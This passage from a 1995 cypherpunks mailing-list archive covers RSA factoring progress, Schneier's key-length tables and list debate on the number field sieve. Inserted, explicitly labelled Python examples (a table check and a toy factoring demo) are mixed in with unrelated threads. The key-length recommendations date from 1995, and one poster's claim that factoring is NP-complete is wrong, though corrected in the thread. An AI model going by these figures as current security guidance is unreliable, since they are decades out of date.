And the general number field sieve is still getting faster. 
Mathematicians keep coming up with new tricks, new optimizations,
new techniques.  There's no reason to think this trend won't
continue.  A related algorithm, the special number field sieve,
can already factor numbers of a certain specialized form--numbers
not generally used for cryptography--much faster than the general
number field sieve can factor general numbers of the same size. 
It is not unreasonable to assume that the general number field
sieve can be optimized to run this fast; it is possible that the
NSA already knows how to do this.  Table 3 gives the number of
mips-years required for the special number field sieve to factor
numbers of different lengths.

         Table 3: Factoring Using the Special Number Field Sieve

         # of bits         mips-years required to factor

         512               < 200
         768               100,000
         1024              3*10^7
         1280              3*10^9
         1536              2*10^11
         2048              4*10^14

At a European Institute for System Security workshop in 1992, the
participants agreed that a 1024-bit modulus should be sufficient
for long-term secrets through 2002.  However, they warned: 
"Although the participants of this workshop feel best qualified
in their respective areas, this statement [with respect to
lasting security] should be taken with caution."  This is good
advice.

The wise cryptographer is ultra-conservative when choosing
public-key key lengths.  To determine how long a key you need
requires you to look at both the intended security and lifetime
of the key, and the current state-of-the-art of factoring.  Today
you need a 1024-bit number to get the level of security you got
from a 512-bit number in the early 1980s.  If you want your keys
to remain secure for 20 years, 1024 bits is likely too short.

Even if your particular secrets aren't worth the effort required
to factor your modulus, you may be at risk.  Imagine an automatic
banking system that uses RSA for security.  Mallory can stand up
in court and say: "Did you read in the newspaper in 1994 that
RSA-129 was broken, and that 512-bit numbers can be factored by
any organization willing to spend a few million dollars and wait
a few months?  My bank uses 512-bit numbers for security, and by
the way I didn't make these seven withdrawals."  Even if Mallory
is lying, the judge will probably put the onus on the bank to
prove it.

Earlier I called making predictions foolish.  Now I am about to
make some.  Table 4 gives my recommendations for public-key
lengths, depending on how long you require the key to be secure. 
There are three key lengths for each year, one secure against an
individual, one secure against a major corporation, and the third
secure against a major government.

Here are some assumptions from the mathematicians who factored
RSA-129:

         We believe that we could acquire 100 thousand machines
         without superhuman or unethical efforts.  That is, we would
         not set free an Internet worm or virus to find resources for
         us.  Many organizations have several thousand machines each
         on the net.  Making use of their facilities would require
         skillful diplomacy, but should not be impossible.  Assuming
         the 5 mips average power, and one year elapsed time, it is
         not too unreasonable to embark on a project which would
         require half a million mips years.

The project to factor the 129-digit number harnesses an estimated
0.03% of the total computing power of the Internet, and they
didn't even try very hard.  It isn't unreasonable to assume that
a well-publicized project can harness 0.1% of the world's
computing power for a year.

Assume a dedicated cryptanalyst can get his hands on 10,000 mips-
years, a large corporation can get 10^7 mips-years, and that a
large government can get 10^9 mips-years.  Also assume that
computing power will increase by a factor of ten every five
years.  And finally, assume that advances in factoring
mathematics allow us to factor general numbers at the speeds of
the special number field sieve.  Table 4 recommends different key
lengths for security during different years.

         Table 4: Recommended public-key key lengths (in bits)

         Year     vs. I             vs. C             vs. G
         1995      768              1280              1536
         2000     1024              1280              1536
         2005     1280              1536              2048
         2010     1280              1536              2048
         2015     1536              2048              2048

Remember to take the value of the key into account.  Public keys
are often used to secure things of great value for a long time:
the bank's master key for a digital cash system, the key the
government uses to certify its passports, a notary public's
digital signature key.  It probably isn't worth the effort to
spend months of computing time to break an individual's private
key, but if you can print your own money with a broken key the
idea becomes more attractive.  A 1024-bit key is long enough to
sign something that will be verified within the week, or month,
or even a few years.  But you don't want to stand up in court
twenty years from now with a digitally signed document, and have
the opposition demonstrate how to forge documents with the same
signature.

Making predictions beyond the near future is even more foolish. 
Who knows what kind of advances in computing, networking, and
mathematics are going to happen by 2020?  However, if you look at
the broad picture, in every decade we can factor numbers twice as
long as in the previous decade.  This leads to Table 5.

         Table 5:  Long-range factoring predictions 

         Year     Key length (in bits)
         1995     1024
         2005     2048
         2015     4096
         2025     8192
         2035     16,384
         2045     32,768

Not everyone will agree with my recommendations.  The NSA has
mandated 512-bit to 1024-bit keys for their Digital Signature
Standard--far less than I recommend for long-term security.  PGP
has a maximum RSA key length of 1280 bits.  Lenstra, the world's
most successful factorer, refuses to make predictions past ten
years.  And Table 6 gives Ron Rivest's key-length
recommendations, originally made in 1990, which I consider much
too optimistic.  While his analysis looks fine on paper, recent
history illustrates that surprises regularly happen.  It makes
sense to choose your keys to be resilient against future
surprises.

         Table 6: Rivest's Optimistic Key-Length Recommendations (In
         Bits)

         Year     Low      Avg      High
         1990     398      515      1289
         1995     405      542      1399
         2000     422      572      1512
         2005     439      602      1628
         2010     455      631      1754
         2015     472      661      1884
         2020     489      677      2017

         Low estimates assume a budget of $25,000, the quadratic
         sieve algorithm, and a technology advance of 20% per year. 
         Average estimates assume a budget of $25 million, the
         general number field sieve algorithm, and a technology
         advance of 33% per year.  High estimates assume a budget of
         $25 billion, a general quadratic sieve algorithm running at
         the speed of the special number field sieve, and a
         technology advance of 45% per year.

There is always the possibility that an advance in factoring will
surprise me as well, but I think that unlikely.  But why trust
me?  I just proved my own foolishness by making predictions.
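
Table 4 can be cross-checked against the assumptions stated just before it. The following Python is an added example, not part of the original post: it scales the three attacker budgets by ten every five years, finds the smallest Table 3 size whose cost exceeds each budget, and computes the margin of each Table 4 entry. Treating "< 200" as 200 and all function names are assumptions.

```python
# Table 3 of the post: mips-years for the special number field sieve, by
# modulus size in bits. The post gives "< 200" for 512 bits; 200 is used
# here as an upper bound (assumption).
SNFS_MIPS_YEARS = {512: 200, 768: 10**5, 1024: 3 * 10**7,
                   1280: 3 * 10**9, 1536: 2 * 10**11, 2048: 4 * 10**14}

# Attacker budgets in mips-years as assumed in the post for 1995:
# individual (I), large corporation (C), large government (G).
BUDGET_1995 = {"I": 10**4, "C": 10**7, "G": 10**9}

# Table 4 of the post: recommended key lengths (vs. I, vs. C, vs. G).
TABLE_4 = {1995: (768, 1280, 1536),
           2000: (1024, 1280, 1536),
           2005: (1280, 1536, 2048),
           2010: (1280, 1536, 2048),
           2015: (1536, 2048, 2048)}

ATTACKERS = "ICG"


def budget(attacker, year):
    """Budget in mips-years: computing power grows tenfold every five years."""
    return BUDGET_1995[attacker] * 10 ** ((year - 1995) // 5)


def break_even_bits(attacker, year):
    """Smallest tabulated modulus whose SNFS cost exceeds the budget."""
    b = budget(attacker, year)
    for bits in sorted(SNFS_MIPS_YEARS):
        if SNFS_MIPS_YEARS[bits] > b:
            return bits
    return None  # budget exceeds every size in Table 3


def margin(attacker, year):
    """Cost of breaking the Table 4 recommendation divided by the budget."""
    bits = TABLE_4[year][ATTACKERS.index(attacker)]
    return SNFS_MIPS_YEARS[bits] / budget(attacker, year)


def audit():
    """Rows of (year, attacker, recommended, break-even, margin)."""
    return [(year, a, TABLE_4[year][i], break_even_bits(a, year), margin(a, year))
            for year in sorted(TABLE_4)
            for i, a in enumerate(ATTACKERS)]


if __name__ == "__main__":
    for year, a, rec, be, m in audit():
        print(f"{year} vs. {a}: recommended {rec}, break-even {be}, margin {m:g}x")
```

Under these assumptions every Table 4 entry is at or above the break-even size, and several sit one table step higher.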



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doug@OpenMind.com (Doug Cutrell)
Date: Sun, 12 Feb 95 17:33:06 PST
To: cypherpunks@toad.com
Subject: Re: Factoring - State of the Art and Predictions
Message-ID: <ab6456634e021003a86a@[198.232.141.2]>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Schneier gives us:

>         Table 4: Recommended public-key key lengths (in bits)
>
>         Year     vs. I             vs. C             vs. G
>         1995      768              1280              1536
>         2000     1024              1280              1536
>         2005     1280              1536              2048
>         2010     1280              1536              2048
>         2015     1536              2048              2048


I applaud Bruce for making this unpopular presentation of the somber facts.
If these figures are taken seriously, the conclusion is that 1024 bit keys
are not even good TODAY if one is concerned about the C or G level attack.
In fact, not even the 1280 bit key is good for G level attack today.

Pay attention, people.  Factoring is still a good cryptographic approach,
but the key lengths have to keep growing larger.  Factoring may be NP-hard
in the key length, but the rate of growth of our ability to factor is
actually going up exponentially as well.  The speed of encryption and
decryption for 2048 bit keys on my Pentium is quite reasonable today... and
my confidence in the long-term security of my encrypted files has increased
considerably with the advent of PGP 2.6.2, for just that reason.

Doug Cutrell

_____________________________________________________________
Doug Cutrell                    General Partner
doug@OpenMind.com               Open Mind, Santa Cruz
=============================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sun, 12 Feb 95 23:24:08 PST
To: lmccarth@ducie.cs.umass.edu (L. McCarthy)
Subject: Re: UMich student arrested for rape story
In-Reply-To: <199502122347.SAA15127@ducie.cs.umass.edu>
Message-ID: <950212.175322.2U7.rusnews.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, L. Futplex McCarthy writes:

> It appears to me that people on the left are choosing (wrongly, IMHO) to 
> interpret a work of fiction as a threat, and proceed from there. I imagine
> that people on the right don't see the work of fiction as a threat to her, 
> but simply want to ban fictional works they dislike anyway.

Given the current "regulate the Internet" frenzy we're seeing almost
everywhere, couldn't this be an example of grabbing a scapegoat?  I see
this whole deal as opportunistic, especially since the alleged victim of
the "threat" appeared unaware that the "threat" had even been made.
- -- 
Roy M. Silvernail --  roy@cybrspc.mn.org
  perl -e '$x = 1/20; print "Just my \$$x! (adjusted for inflation)\n"'
        "What do you mean, you've never been to Alpha Centauri?"
                                               -- Prostetnic Vogon Jeltz

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLz6g2hvikii9febJAQEi7AP+IuDcbHY/PjI7HC3j29jtHFiMbFIS5fdG
2c08NQgnjiA8ul3fsJUUcmQ/sdr0WxZrR0qIRTwzBoX1baVDr0POARn4DY/5TrbH
Qmav0KW/kJQEqaX2uvu2MvdF5NFWiYlXB06ZysOhgHuj7wcAsCGyTwTpA5hpKmFj
3ZAP0vHuLaM=
=iXE+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 12 Feb 95 15:07:04 PST
To: cypherpunks@toad.com
Subject: Clinton's No Warrant decree, and insulting dogs
Message-ID: <199502122306.SAA27050@pipe2.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by rishab@dxm.ernet.in () on Mon, 13 Feb  
1:26 AM


>Why is Clinton kowtowing to the Notional Security 
>Agency and the Federal  Bureau of Instigation all of a 
>sudden? Is this a 'law-and-order' shift to  the right 
>of a New New Democrat?



The NY Times report today on the near miss of "terrorist 
mastermind" Yousef in Manila after a kitchen blaze of 
cooking-up explosives, says that he was seen walking rapidly 
away talking on a cellular phone.


Allegedly left behind on a laptop was a disk "filled with 
details of his plots to kill Pope John Paul II, and to blow up 
American jets flying in the Far East."


Twenty (20) FBI agents were sent to pick him up in Islamabad, 
Pakistan for safe home in the New York.


A concerned citizen may ask:


What was picked up from the phone, or will be affidavited to 
have been picked up.


What was on the disk, or will be solemnly sworn to have been 
found on the disk.


And, finally, what armament and intergalactic technology 
accompanied the SWAT team -- over and back, to provide full 
cloak and security on land, sea and air?  And, with that show 
as spoof, how was he really imported?  How many other fake 
transports were set in motion?


When will we learn more of the lurid Clancy-juicy details of 
this black-op budget-busting crowd-pleaser?


Is this a laptop dog and pony?  No offense to Fifi and Holy 
Bull and Apple.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zachary  <zachary@pentagon.io.com>
Date: Sun, 12 Feb 95 16:12:48 PST
To: schneier@chinet.chinet.com
Subject: Re: Factoring - State of the Art and Predictions
In-Reply-To: <m0rdnqt-000k5xC@mailbox.mcs.com>
Message-ID: <199502130012.SAA17341@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain



This touches on something I was thinking the other day:  Most
cryptosystems that we seem to use are based on the assumption that
factoring large numbers is a Hard Problem.  Isn't this putting all our
eggs in one basket?  Are there other Hard Problems crypto systems can be
based on?  In the ludicrous case, suppose Eve is visited by aliens and
given a black box that would instantly factor a number irrelevant of its
size... how much of current cryptography would this device invalidate? 
I'm no crypto-expert, so I don't know... but surely there are other hard
problems in the universe that we can base crypto on...

 --Zachary






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 12 Feb 95 18:19:13 PST
To: cypherpunks@toad.com
Subject: Re: Factoring - State of the Art and Predictions
In-Reply-To: <m0rdnqt-000k5xC@mailbox.mcs.com>
Message-ID: <199502130218.SAA00223@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


schneier@chinet.chinet.com writes:

 > ((Comments are appreciated.  -Bruce))

Ok.

[Nice historical presentation of factoring snipped]

 > A new factoring algorithm has taken over from the quadratic
 > sieve: the general number field sieve. In 1989
 > mathematicians would have told you that the general number
 > field sieve would never be practical.

 > In 1992 they would have told you that it was practical, but
 > only faster than the quadratic sieve for numbers greater
 > than 130-150 digits or so. Today it is known to be faster
 > than the quadratic sieve for numbers well below 116 digits.

 > The general number field sieve can factor a 512-bit number
 > over 10 times faster than the quadratic sieve.

The GNFS situation is a little bit more complicated than that.
Today's factoring algorithms work by finding distinct square
roots of the same quadratic residue modulo the number to be
factored.  Each such discovery yields an approximately 50% chance
of factoring the number using Euclid's GCD algorithm.

Since searching directly for a congruence of squares would be
grossly inefficient, one sieves for relations involving arbitrary
powers of numbers from a set called the "factor base", and after
collecting an overdetermined number of such relations, finds
their null space modulo two in a huge matrix operation.  This
yields a relation whose powers are all even, from which a
congruence of squares may be constructed in an obvious manner.

Most popular factoring methods including NFS, GNFS, and numerous
flavors of QS utilize this general scheme, and differ only in the
numbers to which they are applicable and in the methods that they
use to fish for relations in more densely populated mathematical
waters.

GNFS uses a particularly cute trick, which is to express the
number being factored as a polynomial with small coefficients,
evaluated at a small argument.  One can then construct a
homomorphism from a ring of algebraic integers into Z/nZ. This
permits sieving to be conducted in a particularly efficient
fashion.

Finding such a polynomial, unfortunately, is a far from
straightforward task.  Current state of the art is to start with
a guess, and flog it to death on a workstation for several days,
attempting some sort of stepwise refinement.  Although the
problem is mathematically rich, no systematic method currently
exists to pick the "best" polynomial, and the problem of doing so
may be of a difficulty comparable to factoring.

The speed with which GNFS runs and the degree to which it
outperforms QS is extremely sensitive to the polynomial chosen,
so the blanket statement that GNFS outperforms QS by a factor of
10 on 512 bit numbers is, in my opinion, a bit of an
oversimplification.

GNFS is one of the most complicated computer algorithms to be
constructed, sieving and factoring simultaneously in both a ring
of algebraic integers and in Z/nZ. The algorithm has been known
to experience "cycle explosions" in which unexpectedly large
amounts of raw data are produced from relatively small numbers.
It is certainly not something that can be regularly run in
"production mode" and it requires a skilled operator (currently
its creator) to help it coast smoothly through its various
stages.

I don't think GNFS is going to be available in shrink-wrapped
form for quite some time. :)

 > A related algorithm, the special number field sieve, can
 > already factor numbers of a certain specialized
 > form--numbers not generally used for cryptography--much
 > faster than the general number field sieve can factor
 > general numbers of the same size.

NFS and GNFS are essentially the same algorithm.  NFS is simply a
special case where a particularly simple polynomial is known,
Z[a] is a unique factorization domain, and some other nice
algebraic properties are present.  In the case of a general
integer, and a more complex polynomial, some things get messier.

 > It is not unreasonable to assume that the general number
 > field sieve can be optimized to run this fast; it is
 > possible that the NSA already knows how to do this.

I think this is unlikely.  The difference in speed is due to the
fact that NFS only factors specially chosen simple numbers, and
GNFS factors anything.  That is not something that is likely to
be optimized away.

Also, I think we make far too much of the magical ability of the
NSA to do things.  At the present point in time, most of the
cryptomathematical expertise in the world is external to the NSA.
The NSA didn't invent GNFS, or for that matter, public key
cryptography.

 > Making predictions beyond the near future is even more
 > foolish. Who knows what kind of advances in computing,
 > networking, and mathematics are going to happen by 2020?
 > However, if you look at the broad picture, in every decade
 > we can factor numbers twice as long as in the previous
 > decade.

GNFS probably represents the final step in the evolution of the
"combination of congruences" factoring methods.  Further
refinements would probably be such complicated algorithms as to
be impractical to program.

Additional improvements in our ability to break RSA will probably
come via some new factoring scheme that we are presently unaware
of, or via a method of computing the inverse of the encryption
permutation used by RSA which does not require explicit formation
of the factors of the modulus.

 >          Table 5:  Long-range factoring predictions

 >          Year     Key length (in bits)
 >          1995     1024
 >          2005     2048
 >          2015     4096
 >          2025     8192
 >          2035     16,384
 >          2045     32,768

I think factoring technology may reach its "Omega Point" long
before 2045.  Twenty years from now, we might be able to factor
anything.  I think predictions past ten years are pure
speculation.

 > There is always the possibility that an advance in
 > factoring will surprise me as well, but I think that
 > unlikely.

I expect to be surprised by an advance in factoring momentarily.
You are far too pessimistic. :)

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $
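
The scheme described in the message above (smooth relations over a factor base, a null space modulo two, then a GCD) can be run end to end on a toy modulus. The following Python is an added example, not part of the original message: it scans x^2 mod n directly in the style of Dixon's method rather than sieving as QS or NFS do, and the modulus 84923, the smoothness bound of 30 and all function names are constructed for illustration.

```python
import math


def small_primes(bound):
    """Factor base: all primes <= bound (trial division is fine at toy size)."""
    return [p for p in range(2, bound + 1)
            if all(p % q for q in range(2, math.isqrt(p) + 1))]


def exponent_vector(m, base):
    """Exponents of m over the factor base, or None if m is not smooth."""
    if m == 0:
        return None
    exps = []
    for p in base:
        e = 0
        while m % p == 0:
            m //= p
            e += 1
        exps.append(e)
    return exps if m == 1 else None


def try_dependency(n, base, relations, subset):
    """Combine relations whose exponents sum to even values into a congruence
    x^2 = y^2 (mod n). Returns a nontrivial factor, or None if x = +-y (mod n)."""
    x, total = 1, [0] * len(base)
    for k in subset:
        xk, exps = relations[k]
        x = x * xk % n
        total = [a + b for a, b in zip(total, exps)]
    y = 1
    for p, e in zip(base, total):
        y = y * pow(p, e // 2, n) % n
    g = math.gcd(x - y, n)  # Euclid's algorithm
    return g if 1 < g < n else None


def factor(n, bound=30, limit=100_000):
    """Factor an odd composite n with two distinct prime factors (toy sizes)."""
    base = small_primes(bound)
    relations = []   # (x, exponent vector of x^2 mod n)
    pivots = {}      # lowest set bit -> (parity row, bitmask of relations used)
    start = math.isqrt(n) + 1
    for x in range(start, start + limit):
        exps = exponent_vector(x * x % n, base)
        if exps is None:
            continue
        relations.append((x, exps))
        # Gaussian elimination over GF(2): each row holds exponent parities,
        # hist records which relations were XORed together to produce it.
        row = sum((e & 1) << j for j, e in enumerate(exps))
        hist = 1 << (len(relations) - 1)
        while row:
            bit = row & -row
            if bit not in pivots:
                pivots[bit] = (row, hist)
                break
            prow, phist = pivots[bit]
            row ^= prow
            hist ^= phist
        else:
            # Row reduced to zero: a null-space vector, all exponents even.
            subset = [k for k in range(len(relations)) if hist >> k & 1]
            g = try_dependency(n, base, relations, subset)
            if g:
                return tuple(sorted((g, n // g)))
            # Trivial congruence (the roughly 50% failure case): keep going.
    return None


N = 84923  # constructed toy modulus

if __name__ == "__main__":
    print(factor(N))
```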



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Sun, 12 Feb 95 15:45:24 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: UMich student arrested for rape story
In-Reply-To: <199502121026.CAA19268@igc3.igc.apc.org>
Message-ID: <199502122347.SAA15127@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Rich Dutcher writes:
> However, given the information available to date, I see no reason to 
> believe that he's been busted for writing "erotic fiction"  rather than 
> threatening a woman.  

The July `94 issue of Harper's described the case of a Menlo Park city 
employee who claimed in 1993 to be harassed by some paintings of female nudes
hanging in a hallway. The city removed the paintings the following day. It
used to be that when the majority of people in some state/county/town 
disapproved of some instance of expression, they could suppress it. This was
bad. Nowadays, it takes just one zealot to suppress it. This is much worse.
As far as I can see, anyone can claim to be harassed/threatened/offended by
just about anything, and get away with it.  Just the other day, I heard that
in Vermont (or was it New Hampshire ?), they're still talking seriously about
an amendment to the state constitution against burning the U.S. flag. Between
the censors on the left and the censors on the right, there's precious little
room remaining for those of us in the middle who believe in tolerating
divergent views.

It appears to me that people on the left are choosing (wrongly, IMHO) to 
interpret a work of fiction as a threat, and proceed from there. I imagine
that people on the right don't see the work of fiction as a threat to her, but 
simply want to ban fictional works they dislike anyway.

> Violence against women is too real, 

Strongly agreed, but a newsgroup article is not an act of violence.

> and in other contexts courts have held to a standard of what a "reasonable 
> woman" might fear.

Well, we'll have to see how it goes. It's tough for me to see why a 
"reasonable woman" would fear an article of which she was totally unaware.

I get the impression that neither did he imply a threat, nor did she infer a
threat. 

> BTW, does alt.sex.stories presume fiction, or is it pretend truth 
> like the readers' sex stories in Penthouse?

I don't know for sure, though I expect alt.sex.wizards would be more likely
to fall in the latter category :] .

-L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sun, 12 Feb 95 16:53:30 PST
To: Zachary  <zachary@pentagon.io.com>
Subject: Re: Factoring - State of the Art and Predictions
Message-ID: <ab645cdf0102100421a7@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:12 PM 02/12/95, Zachary wrote:
>This touches on something I was thinking the other day:  Most
>cryptosystems that we seem to use are based on the assumption that
>factoring large numbers is a Hard Problem.  Isn't this putting all our
>eggs in one basket?  Are there other Hard Problems crypto systems can be

Keep in mind that it's been mathematically proven that factoring is
NP-complete.  That is, it's in the set of problems including such things as
discrete logs and the travelling salesman problem, such that if a
polynomial time solution is found to _any_ of these problems, one can be
found for all of them.  Of course it hasn't been proven that none of the
problems in NP can be solved in polynomial time, so it hasn't been proven
that these are "hard problems".  But I suspect that most problems suspected
to be Hard Problems that one could base a crypto system off of, are also
NP-complete, so it wouldn't be any better to use them than to use
factoring.   Logarithms, for instance, are used in some crypto systems, and
are another suspected Hard Problem, but are also NP complete.  So if
factoring is solved,  discrete logarithms will be solved too.

At least that's how I understand it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sun, 12 Feb 95 17:17:01 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: Factoring - State of the Art and Predictions
In-Reply-To: <ab645cdf0102100421a7@[132.162.201.201]>
Message-ID: <199502130119.UAA03807@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



Jonathan Rochkind writes:
>
>Keep in mind that it's been mathematically proven that factoring is
>NP-complete.
...

No it hasn't.  Factoring is believed to be hard, but no one has ever
shown it to be NP-hard (let alone NP complete).

...
>factoring.   Logarithms, for instance, are used in some crypto systems, and
>are another suspected Hard Problem, but are also NP complete.  So if
>factoring is solved,  discrete logarithms will be solved too.

Ditto for discrete log.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 12 Feb 95 17:21:31 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Factoring - State of the Art and Predictions
In-Reply-To: <Pine.3.89.9502121608.A20084-0100000@netcom10>
Message-ID: <9502130121.AA19540@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" says:
> So far no one has found a way of applying NP problems to
> Crypto.

Further than that, it has been shown that a large class of ways to
apply NP complete problems to crypto are insecure -- this being
generalizations of the break of the knapsack problem based
cryptosystems...

> Of course you can do discrete log on weird fields -- there
> is a lot of research in that which I do not understand at all.

Most of the elliptic curve stuff maps pretty straightforwardly into
the "normal" case and vice versa.

.pmm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sun, 12 Feb 95 17:26:36 PST
To: Matt Blaze <cypherpunks@toad.com
Subject: Re: Factoring - State of the Art and Predictions
Message-ID: <ab64660a03021004491e@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:19 PM 02/12/95, Matt Blaze wrote:
>No it hasn't.  Factoring is believed to be hard, but no one has ever
>shown it to be NP-hard (let alone NP complete).

Woops.  Thanks for the correction, and thanks to everyone else who managed
to correct me within only minutes after I made the mistake.  :)  You can
all stop sending me mail now.

[Moral of the story: don't make a math error on the cypherpunks list.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 12 Feb 95 17:45:56 PST
To: schneier@chinet.chinet.com
Subject: Re: Factoring - State of the Art and Predictions
In-Reply-To: <m0rdnqt-000k5xC@mailbox.mcs.com>
Message-ID: <9502130145.AA19584@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



schneier@chinet.chinet.com says:
> Making predictions beyond the near future is even more foolish. 
> Who knows what kind of advances in computing, networking, and
> mathematics are going to happen by 2020?  However, if you look at
> the broad picture, in every decade we can factor numbers twice as
> long as in the previous decade.  This leads to Table 5.

I'm not sure I agree with this assumption. From current knowledge, it
seems that factoring is still exponential -- we've just progressed on
the algorithms a bit. That can't continue forever, though. Assuming
algorithms remain stable on your most optimistic estimate (which would
require some advances even so), we would assume that factoring would
remain exponential, and that adding a constant number of bits to a
number would add a constant factor to the increase in
complexity. Since computing speeds are also rising exponentially, but
not superexponentially, we would assume that the number of bits we
could factor would grow linearly with time -- that is, each decade
would see numbers about another 60-80 digits long factored. This would
mean that every doubling in key length would give us more than just a
constant increase in the safety factor.

Perry
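
[Added example, not part of the original message.] The growth argument above can be checked numerically: the sketch below solves for the largest factorable size per decade under the message's exponential-cost assumption, under the "double every decade" rule quoted from Table 5's lead-in, and, going beyond the message, under the published heuristic running time of the general number field sieve. The 130-digit baseline, the 1.5-year compute doubling time and the 70-digits-per-decade calibration (midpoint of the 60-80 quoted) are assumptions chosen for illustration.

```python
import math

LOG2_10 = math.log2(10)

# Assumptions (not from the thread): compute available to an attacker doubles
# every 1.5 years, and the exponential model is calibrated so that one decade
# of such growth buys 70 more digits (midpoint of the 60-80 in the message).
DOUBLING_YEARS = 1.5
DIGITS_PER_DECADE = 70
BITS_PER_DOUBLING = DIGITS_PER_DECADE * LOG2_10 / (10 / DOUBLING_YEARS)

# Constant in the heuristic GNFS running time
# exp(c * (ln n)^(1/3) * (ln ln n)^(2/3)), c = (64/9)^(1/3).
GNFS_C = (64 / 9) ** (1 / 3)


def log2_cost_exponential(bits):
    """Exponential model: every BITS_PER_DOUBLING extra bits doubles the work."""
    return bits / BITS_PER_DOUBLING


def log2_cost_gnfs(bits):
    """log2 of the heuristic GNFS work factor for a modulus of `bits` bits."""
    ln_n = bits * math.log(2)
    nats = GNFS_C * ln_n ** (1 / 3) * math.log(ln_n) ** (2 / 3)
    return nats / math.log(2)


def factorable_bits(log2_cost, base_bits, doublings):
    """Largest size whose cost is at most 2**doublings times the cost at
    base_bits, found by bisection (log2_cost must be increasing)."""
    target = log2_cost(base_bits) + doublings
    lo, hi = base_bits, base_bits * 64
    for _ in range(200):
        mid = (lo + hi) / 2
        if log2_cost(mid) <= target:
            lo = mid
        else:
            hi = mid
    return lo


def projection(log2_cost, base_digits, decades):
    """Factorable size in decimal digits at decade 0, 1, ..., `decades`."""
    base_bits = base_digits * LOG2_10
    sizes = []
    for d in range(decades + 1):
        doublings = 10 * d / DOUBLING_YEARS
        sizes.append(factorable_bits(log2_cost, base_bits, doublings) / LOG2_10)
    return sizes


def compare(base_digits=130, decades=3):
    """Return the three projections side by side (base_digits is an assumed
    starting point, not a figure from the thread)."""
    return {
        "doubling": [base_digits * 2 ** d for d in range(decades + 1)],
        "exponential": projection(log2_cost_exponential, base_digits, decades),
        "gnfs": projection(log2_cost_gnfs, base_digits, decades),
    }


if __name__ == "__main__":
    result = compare()
    print("decade  doubling  exponential  gnfs")
    for d in range(len(result["doubling"])):
        print(f"{d:>6}  {result['doubling'][d]:>8}  "
              f"{result['exponential'][d]:>11.0f}  {result['gnfs'][d]:>4.0f}")
```

Under the exponential model each decade adds the same number of digits; under the GNFS formula the per-decade step grows slowly but stays well below a doubling for these assumed hardware parameters.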




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Sun, 12 Feb 95 21:22:34 PST
To: cypherpunks@toad.com
Subject: bill alert...
Message-ID: <199502130515.VAA14482@art.net>
MIME-Version: 1.0
Content-Type: text/plain


Do you think this will force folks into using encryption?
If I was a sysop, I sure would have all my users using
encryption... :)

-lile



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Lile Elam	    |  "a brush in hand, a wisp of wind, she sighs 
lile@art.net        |   knowing that this will be the great one..."	
http://www.art.net  |						    -lile
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




                       -> EMA ALERT <-
            News For and About the Members of the
               ELECTRONIC MESSAGING ASSOCIATION
============================================================
                February 3, 1995 -- Number 18
<---------------------------------------------------------->
                  ***** SPECIAL ALERT *****
 - Congress to consider making all system operators liable
   for messaging content.  Bill would force employers to
   monitor message content.              ACTION NEEDED NOW!
<---------------------------------------------------------->

UNREASONABLE NETWORK POLICING PROPOSED
   Yesterday, Senator Jim Exon (D-NE) introduced S.314, the
Communications Decency Act of 1995, in the United States
Senate.  In an effort to stamp out digital pornography, it
makes all telecommunications providers doing business in the
United States (from the telephone companies all the way down
to offices that use LANs) liable for the content of anything
sent over their networks.  To avoid the possibility of tens
of thousands of dollars in fines and up to two years in
jail, business owners would be forced to police their
networks and monitor in advance all messages sent over them.

WITHOUT ACTION - COULD BE LAW IN MONTHS
   This bill is substantially the same as the one he put
forward last year.  He will offer it as an amendment to the
pending telecommunications deregulation legislation in the
U.S. Senate, which is expected to be enacted by July.  Last
year, his amendment was adopted even though many thought it
hastily drafted and poorly thought out.  Fortunately, the
telecommunications deregulation legislation died.  This
year, a more conservative U.S. Congress may be even more
